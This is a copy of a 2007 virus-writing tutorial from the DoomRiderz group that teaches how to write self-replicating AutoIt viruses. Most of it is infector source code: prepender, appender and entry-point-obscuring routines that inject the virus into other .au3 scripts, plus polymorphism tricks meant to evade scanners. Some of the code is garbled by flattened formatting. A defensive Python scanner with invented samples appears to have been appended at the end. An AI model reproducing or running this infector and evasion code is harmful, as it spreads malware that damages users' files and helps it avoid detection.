Genetix AutoItv3 Vir Tutorial

April 19, 2017 | Author: 2lazy2cool | Category: N/A

AutoIt Virus Writing Guide Genetix[DoomRiderz] JAN-2007

Introduction:
* About AutoIt

Infections:
* Prepender
* Appender
* EPO

Polymorphism:
* Variable changing
* Randomized String Encryption
* Adding trash
* Breaking lines (Possibly New method)

Outroduction:
* Credits!....

++++++++++++++++++++++++++++++++++++
++++++++++About AutoIt+++++++++++++
++++++++++++++++++++++++++++++++++++

AutoIt v3 is a freeware BASIC-like scripting language designed for automating the Windows GUI and general scripting. It uses a combination of simulated keystrokes, mouse movement and window/control manipulation in order to automate tasks in a way not possible or reliable with other languages (e.g. VBScript and SendKeys). AutoIt is also very small, self-contained and will run on 95, 98, ME, NT4, 2000, XP & 2003 out of the box with no annoying "runtimes" required! You can even make compiled executable scripts that can run without AutoIt being installed! AutoIt was initially designed for PC 'roll out' situations to reliably configure thousands of PCs, but with the arrival of v3 it has become a powerful language able to cope with most scripting needs.

This is from the AutoIt website.. I'm lazy! See http://www.hiddensoft.com/autoit3/

So anyway, my opinion: it's just ANOTHER script language and nobody serious about virus writing cares about these things, but for me it's all about fun and enjoying yourself so just do w/e you

enjoy.. I enjoyed this so maybe someone else will too. ++++++++++++++++++++++++++++++++++++ +++++++++++++Prepender+++++++++++++ +------------------------------------------------------------------------------------++++++++++++++++++++++++++++++++++++ ;Genetix[DoomRiderz] $self=@ScriptName ;get self name $line="" $virus="" $readhost="" $me = FileOpen($self, 0) ;open self while 1 $line = FileReadLine($me) ;read line If @error = -1 Then ExitLoop ;exit EOF if ($line = ";endvirus") then ExitLoop ;exit at end of the virus code EndIf $virus = $virus & @CRLF & $line ;build virus body Wend FileClose($me) $search = FileFindFirstFile("*.au3") ;find AutoIt files If $search = -1 Then Exit ;exit no files EndIf While 1 $file = FileFindNextFile($search) if ($file == "") then ExitLoop ;same exit if no files $host = FileOpen($file, 0) If $host = -1 then ExitLoop ;exit EOF $readhost = FileRead($host, FileGetSize($file)) ;read entire file into variable FileClose($host) if StringInStr($readhost, ";Genetix[DoomRiderz]") True Then ;make sure its not already infected $InsertVirus = FileOpen($file,2) FileWriteline($InsertVirus, _ $virus & @CRLF ";endvirus" & @CRLF & $readhost) ;write virus before victims code (prepend) FileClose($InsertVirus)

EndIf Wend ;continue searching ;endvirus

++++++++++++++++++++++++++++++++++++ +++++++++++++Appender++++++++++++++ +------------------------------------------------------------------------------------++++++++++++++++++++++++++++++++++++ ;start ;Genetix[DoomRiderz] $self=@ScriptName ;get script name $line="" $virus="" $readhost="" $me = FileOpen($self, 0) ;open self while 1 $line = FileReadLine($me) If @error = -1 Then ExitLoop ;exit if EOF if ($line = ";start") then ;find beginning of virus code ExitLoop ;exit loop when found EndIf Wend while 1 $line = FileReadLine($me) ;read 1 line per loop If @error = -1 Then ExitLoop ;exit EOF if ($line = ";endvirus") then ExitLoop ;Stop reading at end of virus EndIf $virus = $virus & @CRLF & $line ;build the virus Wend FileClose($me) $search = FileFindFirstFile("*.au3") ;search for AutoIt files If $search = -1 Then Exit ;exit if nothing is there EndIf While 1 $file = FileFindNextFile($search) if ($file == "") then ExitLoop

$host = FileOpen($file, 0) ;open victim If $host = -1 then ExitLoop ;exit EOF $readhost = FileRead($host, FileGetSize($file)) ;read the entire host code FileClose($host) if StringInStr($readhost, ";Genetix[DoomRiderz]") True Then ;make sure it isnt infected already $InsertVirus = FileOpen($file,2) FileWriteline($InsertVirus, _ $readhost & @CRLF & ";start" & @CRLF & $virus & @CRLF & ";endvirus") ;append the virus FileClose($InsertVirus) EndIf Wend ;continue searching ;endvirus

++++++++++++++++++++++++++++++++++++ ++++++++++++++++EPO++++++++++++++++ +------------------------------------------------------------------------------------++++++++++++++++++++++++++++++++++++ ;start ;Genetix[DoomRiderz] $self=@ScriptName ;get script name ;setup some variables, this needs alot! $line="" $begin="" $virbody="" $virus="" $nextpart="" $readhost="" $complete="" $me = FileOpen($self, 0) ;open itself while 1 ;loop until ExitLoop do us part $line = FileReadLine($me) ;read 1 line per loop If @error = -1 Then ExitLoop ;exit EOF if ($line = ";start") then ExitLoop ;stop, beginning of the virus is found EndIf Wend while 1 $line = FileReadLine($me)

;read 1 line perl loop If @error = -1 Then ExitLoop ;yea.. if StringMid($line, 1, 9) = ";endvirus" Then ExitLoop ;stop, end of the virus is found EndIf $virbody = $virbody & @CRLF & $line ;build the virus body Wend FileClose($me) ;byez $virus = ";start" & @CRLF & $virbody & @CRLF & ";endvirus" ;virus stored in $virus $search = FileFindFirstFile("*.au3") ;find files If $search = -1 Then Exit ;exit if nothing is there EndIf While 1 $file = FileFindNextFile($search) if ($file == "") then ExitLoop ;again.. nvm $host = FileOpen($file, 0) ;open any au3 file If $host = -1 then ExitLoop $readhost = FileRead($host, FileGetSize($file)) ;read it entire host into $readhost FileClose($host) if StringInStr($readhost, ";Genetix[DoomRiderz]") True Then ;check if its already infected if StringInStr($readhost, "EndFunc") False Then ;can it use EPO on this file? $target = FileOpen($file, 0) ;open up the victim file again while 1 ;loopy $line = FileReadLine($target) ;read 1 line per loop If @error = -1 Then ExitLoop ;exit EOF if ($line = "EndFunc") then ;find a home for the virus ExitLoop ;exit loop when thats found EndIf $begin = $begin & @CRLF & $line ;append lines from start to "EndFunc" Wend while 1 $line = FileReadLine($target) ;read line's again If @error = -1 Then ExitLoop ;exit EOF

$nextpart = $nextpart & @CRLF & $line ;read from "EndFunc" to EOF Wend FileClose($target) ;here the virus gets 2 parts of the victim. First is everything until "EndFunk" 2nd is everything after it ;so it has these stored in 2 different variables. ;now we can insert the virus into the middle! hostpart1 + virus + hostpart2. easy! $complete = $begin & @CRLF & $virus & @CRLF & "EndFunc" & @CRLF & $nextpart ;join everything together $InsertVirus = FileOpen($file,2) ;open the victim for writing FileWriteline($InsertVirus, $complete) ;insert the virus FileClose($InsertVirus) EndIf EndIf Wend ;more searching! ;endvirus ++++++++++++++++++++++++++++++++++++ +++++Variable name changing++++++++ +------------------------------------------------------------------------------------++++++++++++++++++++++++++++++++++++ #include ;include this to use arrays in AutoIt Dim $avArray ;define array $avArray = _ArrayCreate("avArray", "self", "host", "readhost", _ "rewrite", "newvalues", "var") ;setup variables to replace $self=@ScriptName ;get the script name $readhost="" $host = FileOpen($self, 0) ;open self If $host = -1 then ExitLoop ;exit EOF $readhost = FileRead($host, FileGetSize($self)) ;read entir virus into variable FileClose($host) $newvalues="" FOR $i=0 to UBound($avArray) - 1 ;loop through each element in the array $var=""

for $x=1 to random(6,12,1) $var = $var & Chr(random(97,122,1)) ;create a new random sized variable ;this can be improved alot! next $readhost = StringReplace($readhost, $avArray[$i], $var) ;replace with new variable Next $rewrite = FileOpen($self,2) FileWrite($rewrite, $readhost) ;rewrite with new code FileClose($rewrite) ++++++++++++++++++++++++++++++++++++ ++++Randomized String Encryption+++ +------------------------------------------------------------------------------------++++++++++++++++++++++++++++++++++++ $self=@ScriptName ;get the script name $readhost="" $host = FileOpen($self, 0) If $host = -1 then ExitLoop $readhost = FileRead($host, FileGetSize($self)) ;read everything into the variable FileClose($host) $code="пÌÂÍËÇØÃÂ~ÑÒÐÇÌÅ~ÃÌÁÐ×ÎÒÇÍÌ94" ;the encrypted string with key appended $original=$code ;original code $key=StringMid($code, stringlen($code)-1, stringlen($code)) ;get the decryption key $decrypt="" $de="" For $i=1 to StringLen($code) $de = Asc(StringMid($code, $i, 1)) - $key ;decrypt using key $decrypt = $decrypt & chr($de) Next $mycode=StringMid($decrypt, 1, stringlen($decrypt)-2) ;remove old key MsgBox(0, "", $mycode) ;good for debugging $rndkey = Random(10,99,1) ;get a new random key $str="" $en="" For $i=1 to StringLen($mycode) $str = Asc(StringMid($mycode, $i, 1)) + $rndkey ;encrypt with new key $en = $en & chr($str) Next

$new = StringReplace($code, $code, $en) & $rndkey ;replace old encrypted string with new $newstr=StringReplace($readhost, $original, $new) ;replace it in the virus code $replace = FileOpen($self,2) FileWrite($replace, $newstr) ;complete! FileClose($replace) actually the idea is to encrypt the virus body so it changes like polymorphism while also being encrypted. but this is good for an example i guess.. ++++++++++++++++++++++++++++++++++++ ++++++++Adding Trash to code+++++++ +------------------------------------------------------------------------------------++++++++++++++++++++++++++++++++++++ $self=@ScriptName ;get self name $line="" $virus="" $me = FileOpen($self, 0) ;open self while 1 $line = FileReadLine($me) ;read line If @error = -1 Then ExitLoop ;exit EOF if random(1,2,1) = 2 then ;should it insert trash here? $trash="" For $i = 1 to random(30,100,1) ;random size 30 to 100 cheracters $trash=$trash & chr(random(50,97,1)) ;generate trash next $line=$line & @CRLF & ";" & $trash ;insert trash EndIf If StringMid($line,1,1) ";" then $virus = $virus & @CRLF & $line ;build the new virus body EndIf Wend FileClose($me) $rewrite = FileOpen($self,2) FileWrite($rewrite, $virus) ;rewrite with new code FileClose($rewrite) ++++++++++++++++++++++++++++++++++++ +++++++++++Breaking Lines++++++++++ +-----------------------------------------------------------------------

--------------++++++++++++++++++++++++++++++++++++ I'm gussing you've not seen this method before? but if so then here it is again. $curline="" $rem="" $restore="" $NewCode="" $me = FileOpen(@ScriptName, 0) ;open self for reading while 1 $curline=FileReadLine($me) ;read the first line If @error = -1 Then ExitLoop ;exit at EOF FOR $i = 1 to 20 ;some things i just cant explain! IF StringInStr($curline, chr(95)) then ;check if there is an underscore in this line $rem = stringmid($curline, 1, StringInStr($curline, chr(95)) - 1) ;remove the underscore $restore = $rem & FileReadLine($me) ;join the line back together $curline = $restore ;set curline back to its normal self ENDIF NEXT $curline = ;call function $NewCode = ;build the new wend FileClose($me)

DoSplit($curline) to do the line splitting $NewCode & @CRLF & $curline code

$rewrite = FileOpen(@ScriptName, 2) ;open self for writing FileWrite($rewrite, $NewCode) ;rewrite with new code FileClose($rewrite) ;close. Func DoSplit($line) ;entry point of splitting function DIM $pos,$pr1,$pr2,$add,$m="" ;setup some variables FOR $i = 1 to stringlen($line) ;loop through the line $m = stringmid($line, $i, 1) ;get the current character IF $m = chr(44) OR $m = chr(61) OR $m = chr(38) then ;check if its anything we can use $pr1 = stringmid($line, 1, $i) ;get the line from start to pos of $m $pr2 = stringmid($line, $i+1, stringlen($line))

;other half from $m to end of line IF Random(1,2,1) = 2 THEN $line = $pr1 & " " & chr(95) & @CRLF & $pr2 ;if rnd is 2 then split the line into 2 parts

ENDIF NEXT Return $line ;return the new line EndFunc ;here is an example of what this method can do: ;a line of code can look like this: stringmid($curline, 1, StringInStr($curline, chr(95)) - 1) ;it can also look like this stringmid($curline, 1, _ StringInStr($curline, chr(95)) - 1) ;or this: stringmid($curline, _ 1, StringInStr($curline, _ chr(95)) - 1) ;and so on.. so each time the code is executed it will add a continuation character "_" in random locations only if this location supports a contuniation.. anything after these characters (. , &) will allow an underscore "_". Splitting 1 line into 2 parts or more.. or join them back to form a single line.. kinda really simple stuff! You should try this to understand it better, it's easy to rewrite into VBS and everyone knows vbs dont they? -----------------------------------------------------------------------------------------------------------------------CREDITS! Kefi - im still awaiting an email from you! retr0 - BUZZ! free0n - puts dances around a lamb pole :p synge - i forgive you for your evil deeds. slagehammer - thx for all the asm sources it's just what i needed! yays! jmp dr3f dr3f: mov irc,[you] And hello's to everyone in DoomRiderz and anyone else missing, i just want to get this over with! ps: i had this strange idea of polymorphism of a kind.. encrypting/decrypting random lines.. i had some success but then got busy with "real life" (yes synge i have 1 :p) so someone else can try this if they think it's worth it. Thats all hope you enjoyed! byez!
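Seen from the detection side, the mutations described above (renamed variables, trash comment lines, `_` line splits) change only the surface text of a script, so a scanner that normalizes the source first can match every variant with one pattern. The following is an added example, not part of the original guide; the indicator names, the heuristics and the sample fragments are assumptions constructed for illustration.

```python
import re

# Literal marker comments the guide's samples leave in a modified script.
MARKERS = (";genetix[doomriderz]", ";endvirus")

def normalize(source: str) -> str:
    """Undo the guide's cosmetic mutations so one pattern covers every variant."""
    text = source.replace("\r\n", "\n")
    # Rejoin lines that were split with the " _" continuation character.
    text = re.sub(r"[ \t]_[ \t]*\n[ \t]*", "", text)
    # Drop comment-only lines; the inserted trash is always a ';' line.
    kept = [ln for ln in text.split("\n") if not ln.lstrip().startswith(";")]
    # AutoIt is case-insensitive: fold case, then collapse every variable name.
    text = re.sub(r"\$\w+", "$v", "\n".join(kept).lower())
    return re.sub(r"\s+", "", text)

def scan(source: str) -> list:
    """Return indicator names; an empty list means nothing matched."""
    hits = [m for m in MARKERS if m in source.lower()]
    code = normalize(source)
    # FileOpen mode 2 truncates the target and opens it for writing.
    writes = re.search(r"fileopen\((\$v|@scriptname),2\)", code) is not None
    if writes and 'filefindfirstfile("*.au3")' in code:
        hits.append("rewrites_au3_scripts")
    if writes and "@scriptname" in code:
        hits.append("rewrites_self")
    return hits

# Constructed fragments (not working scripts): same calls, different surface.
PLAIN = (
    '$self=@ScriptName\r\n'
    '$search = FileFindFirstFile("*.au3")\r\n'
    '$out = FileOpen($file,2)\r\n'
)
MUTATED = (
    '$qwkzt=@ScriptName\r\n'
    ';8A3FJ2K9PLQ7\r\n'
    '$ab = _\r\n FileFindFirstFile("*.au3")\r\n'
    '$cd = FileOpen($ef, _\r\n2)\r\n'
)
BENIGN = '$log = FileOpen("out.log", 2)\r\nFileWrite($log, "done")\r\n'

if __name__ == "__main__":
    for name, src in (("plain", PLAIN), ("mutated", MUTATED), ("benign", BENIGN)):
        print(name, scan(src))
```

The marker comments are the weakest indicator, because the trash-insertion routine drops comment lines on rewrite; the behavioural matches on normalized code survive that. Treat hits as triage signals, since a legitimate script can also write to a path held in a variable.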
